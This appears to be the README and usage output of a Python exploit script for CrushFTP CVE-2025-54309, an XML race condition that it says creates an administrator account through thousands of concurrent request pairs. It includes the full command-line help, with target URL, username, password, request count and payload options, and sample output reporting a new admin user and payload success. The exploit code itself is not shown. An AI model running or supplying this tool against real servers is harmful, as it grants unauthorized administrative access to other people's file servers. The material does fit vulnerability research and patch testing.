
Python exploit for CrushFTP CVE-2025-54309 XML race condition vulnerability. Creates admin user via concurrent requests with configurable payload types and request count.
Race condition PoC by watchtower, adjusted to be more extensible.
python crushedftp.py
usage: crushedftp.py [-h] [-u USERNAME] [-p PASSWORD] [-r REQUESTS] [-P PAYLOAD] target
CrushFTP CVE-2025-54309 XML Race Condition Exploit
positional arguments:
target Target CrushFTP URL (e.g. http://ftp.myserver.poo)
options:
-h, --help show this help message and exit
-u, --username USERNAME
username for user_create payload: (default: meow)
-p, --password PASSWORD
password for user_create payload (default: meow!)
-r, --requests REQUESTS
Number of request pairs (default: 5000)
-P, --payload PAYLOAD
payload type
[*] Target: http://ftp.test.com
[*] New admin user: test:test
[*] PROGRESS: 50/5000 request pairs completed...
[+] Payload success!
Payload Success!